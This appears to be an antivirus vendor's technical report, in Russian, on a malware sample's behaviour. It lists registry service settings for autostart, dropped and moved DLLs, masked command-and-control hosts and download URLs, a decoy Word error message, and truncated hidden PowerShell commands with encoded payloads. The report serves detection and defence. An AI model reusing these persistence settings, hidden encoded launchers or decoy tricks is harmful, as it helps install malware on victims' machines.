Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\fmtd.myl] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\fmtd.myl] 'ImagePath' = '%WINDIR%\SysWOW64\rundll32.exe "%WINDIR%\SysWOW64\Rnbi\fmtd.myl",RunDLL'
Создает следующие сервисы
- 'fmtd.myl' %WINDIR%\SysWOW64\rundll32.exe "%WINDIR%\SysWOW64\Rnbi\fmtd.myl",RunDLL
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD JAB2AHkAMQBXAD0AIAAgAFsAdAB5AFAARQBdACgAIgB7ADAAfQB7ADQAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACAAJwBzAFkAJwAsACcAZQBtACcALAAnAC4AaQBvAC4AZABJACcALAAnAFIAZQBjAHQA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1572
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1122177.cvr
- %HOMEPATH%\ka6mhcw\kp70shz\j4tcch.dll
Удаляет следующие файлы
- %WINDIR%\syswow64\rnbi\fmtd.myl
Перемещает следующие файлы
- %HOMEPATH%\ka6mhcw\kp70shz\j4tcch.dll в %WINDIR%\syswow64\rnbi\fmtd.myl
Сетевая активность
Подключается к
- '97.##0.3.198':80
TCP
Запросы HTTP GET
- http://th####tfikrah.com/wp-content/B1rS/
Запросы HTTP POST
- http://97.##0.3.198/oitzfx90bq9zsei/hjiv2u8o1njnpz6/
UDP
- DNS ASK ry###puter.com
- DNS ASK d-##m.com
- DNS ASK th####tfikrah.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD JAB2AHkAMQBXAD0AIAAgAFsAdAB5AFAARQBdACgAIgB7ADAAfQB7ADQAfQB7AD...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Ka6mhcw\Kp70shz\J4tcch.dll #1
- '%WINDIR%\syswow64\rundll32.exe' "%WINDIR%\SysWOW64\Rnbi\fmtd.myl",RunDLL
